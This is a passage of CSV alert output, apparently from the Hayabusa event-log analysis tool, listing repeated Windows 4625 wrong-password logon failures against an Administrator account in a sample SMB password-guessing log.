NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1R4wlYWS4SkM3dF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsZy0Yjvk720Mu22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RusStjhReKBmS0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eJuPYLTcGaGvErLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: raCbua01mzU1Djuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fnt8atAbMtxXivUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: psokvQJyMn5m5rMh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wTPGqOITsOhpTgIF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xxhGrLzhwNziihc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UIb1lHuPaC62UlBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2uvXuLIR9yvmWngF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MI35CCybjNtntfwo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GTJfOkk0fUC5YCX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jk6PsiAiLPsHGUh1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KeGDMp9My5eLJz55 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BvDQphjvwOCsNQqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJhad4aocvPMYVP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJl3XqTUxvqiKKaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1fAJDfguuoNxWiR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daAeGcsqoqERsEu6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0iynnwxS8v4C5b3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2kU7IS4XCvgRpTff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MBC8AJXBQHrCMrO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NSGraDQmI4MAq9Ls : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7u2Pb9y8hB0iYWh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A657rbd6k4AD7M4i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7rkiDUBuTCU2jDXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jjsCFTQoobrkQoWF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dNXav95nZyBhVOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yeq1x56Ct6R2Nu3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pUwyCNtwydEQu2bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bX7eihAOk3PUgbwM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPXqAsaYaXEr8I9L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4SaEmIpmlH1VMDun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3Dvp43a2h7Mzx2H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g3voKlRXc7rIaIYs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GF1Q5OhCLRAi96mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: caHe4iY2CQoiumQI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJi6UAm6Pp6eax8Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EW0t2wapD8yniO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PnaITXTihpB0stwx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tdBVoa82WKEAW2ce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BelKzJrEjGIcU2dN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ujeb7fRHPGCGmFm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Czwt7KF2sQHemwdJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LQQ4nNpbfKKVCJZH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6jwIc6e0AHAhXKK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nld9Job0Ll1Fgtmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9sS6i9iU3PXhokz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heaYv6Np8swhoVc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7rzgNBtUJkS93pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh45suNQ09FzPBjd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BOnwAGxxz994k6Ee : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L26mvUKOgGptcKaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aqldRjcLl8KFZr5h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ycNPBtmRHShPOcRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ISlMGsVvXry0rbju : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MjGjh70EQ5YVGJUt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yaYM5N2kuvuRCHRU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 32wgj2t7BLBviVxd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vr1kMRxLEaCIWIbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4PHEJyKgp5wXRtBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbaoz8rTZVXUjRAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d4eD3JQ5gquIqgND : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9slFFSSXhFxPqG1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDb5Up4KwJj0hN5n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxqIpDLlnf6Xyc34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTCTTYmKTIzzJwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oD3dLxlB3qWIhZEQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fe9xMOoCxPJIIyVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DW3YgBZYiGTeEw66 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VAKeeIcOeiQ3H9NF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmF3ot3gJCsBlSwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDjoResfZvvVqqE5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V4dwzMwvVtzztGwr : IP Address: 192.168.198.149 : AuthPackage: 